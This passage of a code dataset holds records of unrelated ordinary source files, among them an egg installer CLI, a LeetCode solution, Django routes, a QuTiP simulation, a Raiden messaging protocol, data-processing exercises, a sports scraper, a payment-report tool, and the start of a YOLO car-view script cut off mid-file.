sorted(os.listdir(egg_info_dir)):\n if not pat.match(fn):\n continue\n d = read_meta(join(egg_info_dir, fn))\n if d is None:\n continue\n yield d['egg_name']\n\n\ndef print_installed(prefix=sys.prefix):\n fmt = '%-20s %s'\n print(fmt % ('Project name', 'Version'))\n print(40 * '=')\n for fn in get_installed(prefix):\n print(fmt % name_version_fn(fn))\n\n\ndef install_egg_cli(path, prefix, noapp=False, extra_info=None):\n \"\"\"\n Simple wrapper to install an egg using default egginst progress bar.\n \"\"\"\n installer = EggInst(path, prefix, False, None, noapp)\n\n progress = console_progress_manager_factory(\"installing egg\", installer.fn,\n size=installer.installed_size)\n with progress:\n for currently_extracted_size in installer.install_iterator(extra_info):\n progress.update(currently_extracted_size)\n\n\ndef remove_egg_cli(path, prefix, noapp=False):\n \"\"\"\n Simple wrapper to remove an egg using default egginst progress bar.\n \"\"\"\n installer = EggInst(path, prefix, False, None, noapp=noapp)\n remover = installer._egginst_remover\n if not remover.is_installed:\n logger.error(\"Error: can't find meta data for: %r\", remover.cname)\n return\n progress = console_progress_manager_factory(\"removing egg\", installer.fn,\n remover.installed_size,\n len(remover.files))\n with progress:\n for filename in remover.remove_iterator():\n progress.update(1)\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:] # pragma: no cover\n\n p = argparse.ArgumentParser(usage=\"usage: %(prog)s [options] [EGGS ...]\",\n description=__doc__,\n formatter_class=argparse.RawTextHelpFormatter)\n\n p.add_argument(\"requirements\", help=\"Requirements to install\", nargs='*')\n\n p.add_argument('-l', \"--list\",\n action=\"store_true\",\n help=\"list all installed packages\")\n\n p.add_argument(\"--noapp\",\n action=\"store_true\",\n help=\"don't install/remove application menu items\")\n\n p.add_argument(\"--prefix\",\n action=\"store\",\n default=sys.prefix,\n help=\"install prefix\",\n metavar='PATH')\n\n p.add_argument(\"--pkgs-dir\",\n action=\"store\",\n help=\"Do nothing, kept for backward compatibility.\",\n metavar='PATH')\n\n p.add_argument('-r', \"--remove\",\n action=\"store_true\",\n help=\"remove package(s), requires the egg or project name(s)\")\n\n p.add_argument('-v', \"--verbose\", action=\"store_true\")\n p.add_argument('--version', action=\"store_true\")\n\n ns = p.parse_args(argv)\n if ns.version:\n # Local import to avoid circular imports between enstaller and egginst\n from enstaller import __version__\n print(\"enstaller version:\", __version__)\n return\n\n prefix = normpath(abspath(ns.prefix))\n if prefix != normpath(sys.prefix):\n warnings.warn(\"Using the --prefix option is potentially dangerous. 
\"\n \"You should use enpkg installed in {0} instead.\".\n format(ns.prefix))\n\n if ns.list:\n print_installed(prefix)\n return\n\n if ns.verbose:\n logging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n else:\n logging.basicConfig(level=logging.WARN, format=\"%(message)s\")\n\n for path in ns.requirements:\n if ns.remove:\n remove_egg_cli(path, prefix, ns.noapp)\n else:\n install_egg_cli(path, prefix, ns.noapp)\n\n\nif __name__ == '__main__': # pragma: no cover\n main()\n","sub_path":"venv/lib/python2.7/site-packages/egginst/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":21813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"231352611","text":"\"\"\"\nA sequence of numbers is called a wiggle sequence if the differences between successive numbers strictly alternate between positive and negative. The first difference (if one exists) may be either positive or negative. A sequence with fewer than two elements is trivially a wiggle sequence.\n\nFor example, [1,7,4,9,2,5] is a wiggle sequence because the differences (6,-3,5,-7,3) are alternately positive and negative. In contrast, [1,4,7,2,5] and [1,7,4,5,5] are not wiggle sequences, the first because its first two differences are positive and the second because its last difference is zero.\n\nGiven a sequence of integers, return the length of the longest subsequence that is a wiggle sequence. A subsequence is obtained by deleting some number of elements (eventually, also zero) from the original sequence, leaving the remaining elements in their original order.\n\nExample 1:\n\nInput: [1,7,4,9,2,5]\nOutput: 6\nExplanation: The entire sequence is a wiggle sequence.\nExample 2:\n\nInput: [1,17,5,10,13,15,10,5,16,8]\nOutput: 7\nExplanation: There are several subsequences that achieve this length. One is [1,17,10,13,10,16,8].\nExample 3:\n\nInput: [1,2,3,4,5,6,7,8,9]\nOutput: 2\nFollow up:\nCan you do it in O(n) time?\n\n\n\"\"\"\n\n# two array dp\n# Time complexity -- 0(N)\n# Space complexity -- O(1)\n# Runtime: 40 ms, faster than 70.83% of Python3 online submissions for Wiggle Subsequence.\n# Memory Usage: 13.8 MB, less than 10.00% of Python3 online submissions for Wiggle Subsequence.\n# I should learn to use two arraries in dp\nclass Solution:\n def wiggleMaxLength(self, nums: List[int]) -> int:\n n = len(nums)\n if n <= 1:\n return n\n inc, dec = 1, 1\n for x in range(1, n):\n if nums[x] > nums[x - 1]:\n inc = dec + 1\n elif nums[x] < nums[x - 1]:\n dec = inc + 1\n return max(inc, dec)","sub_path":"Widen/LC376_Wiggle_Subsequence.py","file_name":"LC376_Wiggle_Subsequence.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"71917183","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^$', views.administrator_page),\n    url(r'^new_jd/$', views.new_jd_page),\n    url(r'^jd/(\\d+)/delete/', views.delete_jd),\n    url(r'^jd/(\\d+)/create/$', views.create_jd),\n    url(r'^new_ssh_key/$', views.new_ssh_key_page),\n    url(r'^ssh_key/(\\d+)/delete/', views.delete_ssh_key),\n    url(r'^ssh_key/(\\d+)/create/$', views.create_ssh_key),\n]\n","sub_path":"administrator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"343164710","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom qutip import *\nomega_1=2*np.pi*5.5\nomega_2=2*np.pi*5.526\ng=2*np.pi*0.1\ndetuning=omega_2-omega_1+0.2*2*np.pi\nA=0.1*np.pi\nH1=Qobj(np.diag([0,1,0,0]),dims=[[2,2],[2,2]])*omega_1\nH2=Qobj(np.diag([0,0,1,0]),dims=[[2,2],[2,2]])*omega_2\nH3=Qobj(np.diag([0,0,0,1]),dims=[[2,2],[2,2]])*(omega_1+omega_2)\nH4=g*(tensor(sigmam(),sigmap())+tensor(sigmap(),sigmam()))\nH0=H1+H2+H3+H4\nHi=Qobj(np.diag([0,1,0,0]),dims=[[2,2],[2,2]])\ndef Hi_coeff(t, args):\n    return A*np.cos(detuning*t)\nH = [H0,[Hi,Hi_coeff]]\npsi0=tensor(basis(2,1),basis(2,0))\nt=np.linspace(0,10,10000)\nU=Qobj(np.diag([0,1,0,0]),dims=[[2,2],[2,2]])\nresult=mesolve(H,psi0,t,[],[])\npsit=result.states\nP=expect(U,psit)\nplt.xlabel('time')\nplt.ylabel('Probability')\nplt.plot(t,P)\nplt.show()\n","sub_path":"timedependent.py","file_name":"timedependent.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"156049466","text":"# -*- coding: utf8 -*-\nimport gevent\nfrom ethereum import slogging\n\nfrom raiden.messages import decode, Ack, BaseError, Secret\nfrom raiden.utils import isaddress, sha3, pex\n\nlog = slogging.get_logger(__name__)  # pylint: disable=invalid-name\n\n\nclass RaidenProtocol(object):\n    \"\"\" Encode the message into a packet and send it.\n\n    Each message received is stored by hash and if it is received twice the\n    previous answer is resent.\n\n    Repeat sending messages until an acknowledgment is received or the maximum\n    number of retries is hit.\n    \"\"\"\n\n    try_interval = 1.\n    max_tries = 5\n    max_message_size = 1200\n\n    def __init__(self, transport, discovery, raiden):\n        self.transport = transport\n        self.discovery = discovery\n        self.raiden = raiden\n\n        self.number_of_tries = dict()  # msg hash: count_tries\n        self.sent_acks = dict()  # msghash: Ack\n\n    def send(self, receiver_address, message):\n        if not isaddress(receiver_address):\n            raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n        if isinstance(message, (Ack, BaseError)):\n            raise ValueError('Do not use send for Ack messages or Errors')\n\n        if len(message.encode()) > self.max_message_size:\n            raise ValueError('message size exceeds the maximum {}'.format(self.max_message_size))\n\n        return gevent.spawn(self._repeat_until_ack, receiver_address, message)\n\n    def _repeat_until_ack(self, receiver_address, message):\n        data = message.encode()\n        host_port = self.discovery.get(receiver_address)\n\n        # msghash is removed from the `number_of_tries` once an Ack is\n        # received, resend until we receive it or give up\n        msghash = sha3(data)\n        self.number_of_tries[msghash] = 0\n\n        log.info('SENDING {} > {} : [{}] {}'.format(\n            pex(self.raiden.address),\n            pex(receiver_address),\n            pex(msghash),\n            message,\n        ))\n\n        while msghash in self.number_of_tries:\n            if self.number_of_tries[msghash] > self.max_tries:\n                # FIXME: 
suspend node + recover from the failure\n raise Exception('DEACTIVATED MSG resents {} {}'.format(\n pex(receiver_address),\n message,\n ))\n\n self.number_of_tries[msghash] += 1\n self.transport.send(self.raiden, host_port, data)\n gevent.sleep(self.try_interval)\n\n def send_ack(self, receiver_address, message):\n if not isaddress(receiver_address):\n raise ValueError('Invalid address {}'.format(pex(receiver_address)))\n\n if not isinstance(message, (Ack, BaseError)):\n raise ValueError('Use send_Ack only for Ack messages or Erorrs')\n\n host_port = self.discovery.get(receiver_address)\n data = message.encode()\n msghash = sha3(data)\n\n log.info('SENDING ACK {} > {} : [{}] [echo={}] {}'.format(\n pex(self.raiden.address),\n pex(receiver_address),\n pex(msghash),\n pex(message.echo),\n message,\n ))\n\n self.transport.send(self.raiden, host_port, data)\n self.sent_acks[message.echo] = (receiver_address, message)\n\n def receive(self, data):\n # ignore large packets\n if len(data) > self.max_message_size:\n log.error('receive packet larger than maximum size', length=len(data))\n return\n\n msghash = sha3(data)\n\n # check if we handled this message already, if so repeat Ack\n if msghash in self.sent_acks:\n return self.send_ack(*self.sent_acks[msghash])\n\n # We ignore the sending endpoint as this can not be known w/ UDP\n message = decode(data)\n\n if isinstance(message, Ack):\n # we might receive the same Ack more than once\n if message.echo in self.number_of_tries:\n log.info('ACK RECEIVED {} [echo={}]'.format(\n pex(self.raiden.address),\n pex(message.echo)\n ))\n\n del self.number_of_tries[message.echo]\n else:\n log.info('DUPLICATED ACK RECEIVED {} [echo={}]'.format(\n pex(self.raiden.address),\n pex(message.echo)\n ))\n else:\n # message may not have been decoded\n if message is not None:\n assert isinstance(message, Secret) or message.sender\n self.raiden.on_message(message, msghash)\n","sub_path":"raiden/raiden_protocol.py","file_name":"raiden_protocol.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"306748899","text":"#!/usr/bin/env python2\n# Copyright 2013-present Barefoot Networks, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nquiet = False\n\ndef log(*items):\n if quiet != True:\n print(*items)\n\ndef run_command(command):\n log('>', command)\n return os.WEXITSTATUS(os.system(command))\n\ndef main():\n args = sys.argv[1:]\n rc = run_command(\"python /p4app/main.py \" + ' '.join(args))\n\n sys.exit(rc)\n\nif __name__ == '__main__':\n main()\n","sub_path":"docker/scripts/p4apprunner.py","file_name":"p4apprunner.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"72635465","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\n\nfilename = \"hightemp.txt\"\n#10\nwith open(filename, \"r\") as f:\n 
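# read all lines up front so len(data) matches the wc -l check below\n    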
data =f.readlines()\n print(\"10: hightemp.txtは\"+str(len(data))+\"行です。\")\nos.system(\"wc -l hightemp.txt\")\nprint(\"\\n\\n\\n\\n\\n\")\n#11\nwith open(filename, \"r\") as f:\n data =f.readlines()\n data = [line.replace(\" \", \"\\t\") for line in data]\n print(\">>>11\")\n print(str(data))\nos.system('cat hightemp.txt |tr \" \" \"\\t\" ' )\nprint(\"\\n\\n\\n\\n\\n\")\n\n#12\nwith open(filename,\"r\") as f:\n data = f.readlines()\n data =[line.split(\"\\t\") for line in data]\n print(data)\n col1 = [line[0] for line in data]\n col2 = [line[1] for line in data]\n print(\"12:\\n\"+\"\\n\".join(col1))\n print(\"12:\\n\"+\"\\n\".join(col2))\n\n\nos.system('cat hightemp.txt | cut -f1 >col1.txt')\nos.system('cat hightemp.txt | cut -f2 >col2.txt')\nprint(\"\\n\\n\\n\\n\\n\")\n\n#13\nwith open(\"col1.txt\",\"r\") as f:\n data1 = f.readlines()\nwith open(\"col2.txt\",\"r\") as f:\n data2 = f.readlines()\ndata = [col1+\"\\t\"+col2 for col1,col2 in zip(data1,data2)]\nprint(data)\nos.system('paste -d\"\\t\" col1.txt col2.txt')\n\n#14 #15\nprint (\"Plase input the number of output lines.\")\nN = int(input())\nwith open(filename,\"r\") as f:\n data = f.readlines()\nprint(data[0:N])\nos.system('cat hightemp.txt |head -n'+str(N) )\nprint(data[-N:])\nos.system('cat hightemp.txt |tail -n'+str(N) )\n\n#16\nprint(\"please input the number of split\")\nN = int(input())\n\nos.system(\"LINE=`cat hightemp.txt|wc -l` ; VAR=`expr $LINE / {}` ;cat hightemp.txt|split -l $VAR\".format(N))\n\n\n\n#17\nos.system('cat hightemp.txt | cut -f1 |sort|uniq')\n\n#18\nos.system('cat hightemp.txt |LANG=ja_JP.UTF-8 sort -k3')\n#19\n\nos.system(' cat hightemp.txt |cut -f1 | LANG=ja_JP.UTF-8 sort |LANG=ja_JP.UTF-8 uniq |sort -k1 -n')\nos.system('cat hightemp.txt |cut -f1 | LANG=ja_JP.UTF-8 sort |LANG=ja_JP.UTF-8 uniq -c |sort -k1 -n -r')","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"340097940","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef plot(input_csv):\n analysis = pd.read_csv(input_csv)\n alpha_primes = analysis['learning_factor'].unique()\n\n mins = {\n 'dest_reached_rate': min(analysis['dest_reached_rate']),\n 'mean_normed_time_left': min(analysis['mean_normed_time_left']),\n 'mean_normed_n_penalties': min(analysis['mean_normed_n_penalties']),\n 'mean_normed_cumulative_reward': min(analysis['mean_normed_cumulative_reward']),\n }\n maxs = {\n 'dest_reached_rate': max(analysis['dest_reached_rate']),\n 'mean_normed_time_left': max(analysis['mean_normed_time_left']),\n 'mean_normed_n_penalties': max(analysis['mean_normed_n_penalties']),\n 'mean_normed_cumulative_reward': max(analysis['mean_normed_cumulative_reward']),\n }\n\n for alpha_prime in alpha_primes:\n data = analysis[analysis['learning_factor'].isin([alpha_prime])]\n \n x_axis = data['discount_factor'].unique()\n y_axis = data['exploration_rate'].unique()\n\n dest_reached_rate = data['dest_reached_rate'].reshape(len(x_axis), len(y_axis))\n mean_normed_time_left = data['mean_normed_time_left'].reshape(len(x_axis), len(y_axis))\n mean_normed_n_penalties = data['mean_normed_n_penalties'].reshape(len(x_axis), len(y_axis))\n mean_normed_cumulative_reward = data['mean_normed_cumulative_reward'].reshape(len(x_axis), len(y_axis))\n\n fig, axes = plt.subplots(2, 2, figsize=(18,15))\n\n sns.heatmap(dest_reached_rate, ax=axes[0,0], xticklabels=x_axis.round(2), 
yticklabels=y_axis.round(2), vmin=mins['dest_reached_rate'], vmax=maxs['dest_reached_rate'])\n axes[0,0].set_title(\"Destination reached\\nsuccess rate\")\n sns.heatmap(mean_normed_time_left, ax=axes[0,1], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['mean_normed_time_left'], vmax=maxs['mean_normed_time_left'])\n axes[0,1].set_title(\"Mean normalized time\\nleft to destination\")\n sns.heatmap(mean_normed_n_penalties, ax=axes[1,0], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['mean_normed_n_penalties'], vmax=maxs['mean_normed_n_penalties'])\n axes[1,0].set_title(\"Mean normalized no. of\\npenalties incurred\")\n sns.heatmap(mean_normed_cumulative_reward, ax=axes[1,1], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['mean_normed_cumulative_reward'], vmax=maxs['mean_normed_cumulative_reward'])\n axes[1,1].set_title(\"Mean normalized\\ncumulative rewards\")\n \n for ax in axes.flat:\n plt.setp(ax.get_xticklabels(), rotation=90)\n plt.setp(ax.get_yticklabels(), rotation=0)\n ax.set_xlabel(\"Discount factor\")\n ax.set_ylabel(\"Exploration rate\")\n \n fig.tight_layout()\n fig.savefig(\"plots_learning_{:.1f}.png\".format(alpha_prime))\n\nif __name__ == \"__main__\":\n # No error checks; use carefully\n plot(sys.argv[1])","sub_path":"analysis/plot_measurements.py","file_name":"plot_measurements.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"468231857","text":"from bs4 import BeautifulSoup\nimport requests\nimport numpy as np\nimport re\n\nDATA_DIR = '../../data'\n\n\ndef build_players_map():\n players_map = {}\n\n base_url = 'https://www.basketball-reference.com'\n page_link = base_url + '/teams/'\n page_response = requests.get(page_link, timeout=5)\n page_content = BeautifulSoup(page_response.content, \"html.parser\")\n\n active_teams_table = page_content.find('table', {'id': 'teams_active'})\n active_teams = active_teams_table.find_all(\n 'a', {'href': lambda x: re.match(r'/teams/[A-Z ]+/', x)})\n for team in active_teams:\n team_abrv = fix_team_abrv(team['href'].split('/')[2])\n team_link = base_url + '/teams/' + team_abrv + '/2019.html'\n roster_map = build_roster_map(team_link)\n players_map = {**players_map, **roster_map}\n\n return players_map\n\n\ndef build_roster_map(team_link):\n roster_map = {}\n\n page_response = requests.get(team_link, timeout=5)\n page_content = BeautifulSoup(page_response.content, \"html.parser\")\n\n roster_table = page_content.find('table', {'id': 'roster'})\n trs = roster_table.find(\"tbody\").find_all(\"tr\")\n for tr in trs:\n # number = tr.find('th', {'data-stat': 'number'}).text\n player = tr.find('td', {'data-stat': 'player'})['csk']\n pos = tr.find('td', {'data-stat': 'pos'})['csk']\n roster_map[player] = pos\n\n return roster_map\n\n\ndef fix_team_abrv(team_abrv):\n if team_abrv == 'NJN':\n team_abrv = 'BRK'\n elif team_abrv == 'CHA':\n team_abrv = 'CHO'\n elif team_abrv == 'NOH':\n team_abrv = 'NOP'\n return team_abrv\n\n\nplayers_map = build_players_map()\nnp.save(DATA_DIR + 'data/players_map.npy', players_map)\n","sub_path":"src/scraper/build_players_map.py","file_name":"build_players_map.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"123033601","text":"magic = None\n\n\ndef check_magic(magic_arr, magic_order):\n global magic\n sum1 = sum(magic_arr[0])\n # print(magic_arr[0][1])\n # 
check for row sum equality (iteration over rows)\n    magic = True\n    for i in range(magic_order):\n        sum_row = sum(magic_arr[i])\n        if sum1 != sum_row:\n            magic = False\n            break\n\n    # check for column sum equality (iteration over columns)\n    if magic:\n        for j in range(magic_order):\n            sum_list_col = []\n            for i in range(magic_order):\n                sum_list_col.append(magic_arr[i][j])\n            if sum1 != sum(sum_list_col):\n                magic = False\n                break\n\n    # diagonal sum equality (principal diagonal): only the entries magic_arr[i][i]\n    if magic:\n        sum_diag = sum(magic_arr[i][i] for i in range(magic_order))\n        if sum_diag != sum1:\n            magic = False\n\n    # diagonal sum equality (anti-diagonal, opposite to the principal diagonal)\n    if magic:\n        sum_anti = sum(magic_arr[i][magic_order - i - 1] for i in range(magic_order))\n        if sum_anti != sum1:\n            magic = False\n\n    if magic:\n        print('magic')\n\n\nnum_rows = int(input(\"enter the order of your magic matrix\"))\nnums_of_magic = []\nfor i in range(num_rows):\n    nums = input(f'enter your {i + 1}th line')\n    nums_of_magic.append([int(x) for x in nums.split()])\n\ncheck_magic(nums_of_magic, num_rows)\n","sub_path":"magic matrix.py","file_name":"magic matrix.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"165283192","text":"#######################################################\n## Author: Ashish Anand\n## Date: 15 Dec 2011\n## Intent: To read bills.xlsx and check who has made late payment as per his track record.\n## Requirement: Python 3 Interpreter must be installed\n## Openpyxl for Python 3 must be installed\n#######################################################\n\nfrom Util.Config import GetOption\nfrom Util.Decorators import timeThisFunction\nfrom Util.Exception import MyException\nfrom Util.HTML import Html, Body, UnderLine, Table, tr, td\nfrom Util.Misc import PrintInBox, OpenFileForViewing\n\nfrom whopaid.customers_info import GetAllCustomersInfo\nfrom whopaid.sanity_checks import CheckConsistency\nfrom whopaid.util_whopaid import CompaniesDict, GetAllCompaniesDict,\\\n    SelectUnpaidBillsFrom, floatx, TotalAmountDueForThisCompany\n\nimport os\nimport argparse\n\nGRACEPERIOD = int(GetOption(\"CONFIG_SECTION\", \"GracePeriodInDays\"))\nDEFAULT_PAYMENT = int(GetOption(\"CONFIG_SECTION\", \"DefaultPaymentInDays\"))\nANOMALY_STANDARD_DEVIATION = float(GetOption(\"CONFIG_SECTION\", \"AnomalyStandardDeviation\"))\nFILE_PATH_TXT = os.path.join(os.path.expandvars(\"%temp%\"), \"PaymentChaseUpList.txt\")\nFILE_PATH_HTML = os.path.join(os.path.expandvars(\"%temp%\"), \"PaymentChaseUpList.html\")\n\nclass CandidateCompaniesDict(CompaniesDict):\n    \"\"\"This class represents the resultant companies of the WhoPaid() operation, i.e. companies who could have paid the particular amount.\n    It is basically a dictionary just like the base class. 
Key is company and value is its bills that has been paid\"\"\"\n def __init__(self):\n super(CandidateCompaniesDict, self).__init__()\n\n def __str__(self):\n \"\"\"This function contains all the formatting in which the results should be shown.\"\"\"\n result = \"\"\n if(len(self) > 0):\n for eachCompName, eachComp in self.GetAllBillsOfAllCompaniesAsDict().iteritems():\n result += \"\\n\" + str(eachCompName)\n else:\n result += \"Cannot detect who paid amount\"\n return result\n\n\n@timeThisFunction\ndef main():\n print(\"Churning Data...\")\n allBillsDict = GetAllCompaniesDict().GetAllBillsOfAllCompaniesAsDict()\n defaultersDict = FindDefaulters(allBillsDict)\n defaultedBillsDict = defaultersDict.GetAllBillsOfAllCompaniesAsDict()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--text\", dest='text', type=str, default=None, help=\"If present, the report will be genertated in text format.\")\n parser.add_argument(\"-v\", \"--verbose\", dest='verbose', action=\"store_true\", default=False, help=\"If present, the report will be verbose.\")\n args = parser.parse_args()\n\n if args.text or args.verbose:\n filePath = FILE_PATH_TXT\n else:\n filePath = FILE_PATH_HTML\n\n with open(filePath, \"w\") as f:\n if args.text:\n f.write(\"\\n{:^60}\\n\".format(\"Payment Chase-up list\") + \"_\"*60)\n f.write(DefaultersAsStrWithLessDesc(defaultedBillsDict, allBillsDict))\n elif args.verbose:\n f.write(TotalDefaultersAmount(defaultedBillsDict))\n f.write(DefaultersAsStr(defaultedBillsDict))\n else:\n f.write(DefaultersAsHTMLWithLessDesc(defaultedBillsDict, allBillsDict))\n\n OpenFileForViewing(filePath)\n CheckConsistency()\n\n return\n\n\ndef DefaultersAsHTMLWithLessDesc(defaultedBillsDict, allBillsDict):\n \"\"\"Late Payments as HTML \"\"\"\n result = \"\\n\"\n result += UnderLine(\"
    Payment Chase-up List
    \")\n l = list(defaultedBillsDict.iteritems())\n\n YardStick = DelayInPayment\n YardStick = AmountStuckWithInterest\n\n #Sort the list of names in the order of delay in payment\n l.sort(key=lambda x:YardStick(x[1]), reverse=True)\n\n def TableRow(x, y, z):\n return tr(td(x) + td(y) + td(z))\n\n tableData = \"\"\n for i, (compName, billList) in enumerate(l):\n tableData += TableRow(i+1, compName, \"Rs.\" + str(TotalAmountDueForThisCompany(allBillsDict, compName)))\n return Html(Body(result + Table(tableData)))\n\ndef DefaultersAsStrWithLessDesc(defaultedBillsDict, allBillsDict):\n result = \"\\n\"\n l = list(defaultedBillsDict.iteritems())\n\n YardStick = DelayInPayment\n YardStick = AmountStuckWithInterest\n\n #Sort the list of names in the order of delay in payment\n l.sort(key=lambda x:YardStick(x[1]), reverse=True)\n\n for i, (compName, billList) in enumerate(l):\n result += \"\\n{:>3}. {} (Rs.{})\".format(i, compName, TotalAmountDueForThisCompany(allBillsDict, compName))\n return result\n\ndef DefaultersAsStr(defaultedBillsDict):\n result = \"\\n\"\n l = list(defaultedBillsDict.iteritems())#l contains the list of names\n\n YardStick = AmountStuckWithInterest\n YardStick = DelayInPayment\n\n #Sort the list of names in the order of delay in payment\n l.sort(key=lambda x:YardStick(x[1]), reverse=True)\n\n for eachEntry in l:\n billList = eachEntry[1]\n result += \"(\" + str(int(YardStick(billList))) + \") \"\n result += str(billList)\n return result\n\ndef TotalDefaultersAmount(defaultedBillsDict):\n amt = 0\n for eachComp in defaultedBillsDict:\n for b in defaultedBillsDict[eachComp]:\n amt += int(b.amount)\n\n return \"{:<.04} lakh is the total amount due towards defaulters\".format(str(amt/100000))\n\ndef PaymentMadeInDays(bill):\n assert bill.isPaid, \"This function should only be called on paid bills\"\n timeDelta = (bill.paymentReceivingDate - bill.invoiceDate)\n return timeDelta.days\n\ndef AveragePaymentDays(billList):\n \"\"\"Calculates the average number of days in which payment is made by a customer. Discards the anomalies\"\"\"\n\n days = 0\n ctr = 0\n for b in billList:\n if b.isPaid:\n days += PaymentMadeInDays(b)\n ctr += 1\n if ctr == 0:\n averagePaymentDays = DEFAULT_PAYMENT\n else:\n averagePaymentDays = int(days/ctr)\n\n #Discard the anomalies now\n\n days = 0\n ctr = 0\n for b in billList:\n if b.isPaid:\n creditDays = PaymentMadeInDays(b)\n allowedCreditDays = averagePaymentDays * (1 + (ANOMALY_STANDARD_DEVIATION/100))\n if creditDays < allowedCreditDays:\n days+=creditDays\n ctr += 1\n if ctr == 0:\n averagePaymentDays = DEFAULT_PAYMENT#If no bill present, assume the payment in DEFAULT_PAYMENT days\n else:\n averagePaymentDays = int(days/ctr)\n\n return averagePaymentDays\n\ndef DelayInPayment(billList):\n \"\"\"Calculates the number of days by which the payment is delayed\"\"\"\n\n trust = floatx(GetAllCustomersInfo().GetTrustForCustomer(billList[0].compName))\n if not trust:\n raise MyException(\"M/s {} have 0 trust. 
Please fix the database.\".format(billList[0].compName))\n\n noOfDaysSinceFirstUnpaidBill = 1\n averagePaymentDays = AveragePaymentDays(billList)\n for b in billList:\n assert b.isUnpaid, \"This function should only be called on unpaid bills\"\n delayInExpectedPayment = b.daysOfCredit - averagePaymentDays\n noOfDaysSinceFirstUnpaidBill = max(noOfDaysSinceFirstUnpaidBill, delayInExpectedPayment)\n\n return (noOfDaysSinceFirstUnpaidBill / trust)\n\ndef AmountStuckWithInterest(billList):\n \"\"\"Gives back a number indicating the amount of liability with amount also accounted for\"\"\"\n if not billList:\n return 0\n\n trust = floatx(GetAllCustomersInfo().GetTrustForCustomer(billList[0].compName))\n if not trust:\n raise MyException(\"M/s {} have 0 trust. Please fix the database.\".format(billList[0].compName))\n\n amountStuck = 0\n specifiedCreditLimit = int(GetAllCustomersInfo().GetCreditLimitForCustomer(billList[0].compName))\n historicallyPaidInTheseManyDays = AveragePaymentDays(billList)\n averagePaymentDays = (specifiedCreditLimit + historicallyPaidInTheseManyDays) / 2\n for b in billList:\n assert b.isUnpaid, \"This function should only be called on unpaid bills\"\n delayInExpectedPayment = b.daysOfCredit - averagePaymentDays\n amountStuck += (b.amount * delayInExpectedPayment) / trust\n return amountStuck\n\ndef FindDefaulters(allBillsDict):\n \"\"\"Traverse each company, create a list of all bills and see what is the average number of days in which the payment is made\"\"\"\n defaultersDict = CompaniesDict()\n for eachCompName, billList in allBillsDict.iteritems():\n averageDays = AveragePaymentDays(billList) + GRACEPERIOD\n unpaidBillsList = SelectUnpaidBillsFrom(billList)\n if len(unpaidBillsList):\n for b in unpaidBillsList:\n if b.daysOfCredit > averageDays:\n defaultersDict.AddBill(b)\n\n return defaultersDict\n\nif __name__ == '__main__':\n try:\n main()\n except MyException as ex:\n PrintInBox(str(ex))\n","sub_path":"whopaid/late_payments.py","file_name":"late_payments.py","file_ext":"py","file_size_in_byte":8687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"158980517","text":"import cv2\nimport numpy as np\nimport sys, time, logging\nimport base64\nimport multiprocessing as mp\n\n### self defined class\nfrom carViewLibV2 import runWithFPS\nfrom carViewLibV2 import landMark, traceMark\nfrom carViewLibV2 import CarView, landShift\nfrom yolo4tiny import Yoylv4Tiny\n# ### self defined class\n# from carViewLib import runWithFPS\n# from carViewLib import landMark, traceMark\n# from carViewLib import CarView, landShift\n# logging.basicConfig(level=logging.DEBUG)\nlogging.basicConfig(level=logging.WARNING)\n# logging.basicConfig(level=logging.ERROR)\n\ndef getCap():\n try:\n fileName = sys.argv[1]\n webcam = cv2.VideoCapture(fileName)\n # webcam = cv2.VideoCapture(\"http://192.168.1.103:8000\")\n logging.debug(f\"File {fileName} open success\")\n # print(f\"File {fileName} open success\")\n videoFps = webcam.get(cv2.CAP_PROP_FPS)\n # videoFrameTime = 1.0/videoFps\n logging.debug (\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {:.1f}\".format(videoFps)) \n # print(\"Frames per second using 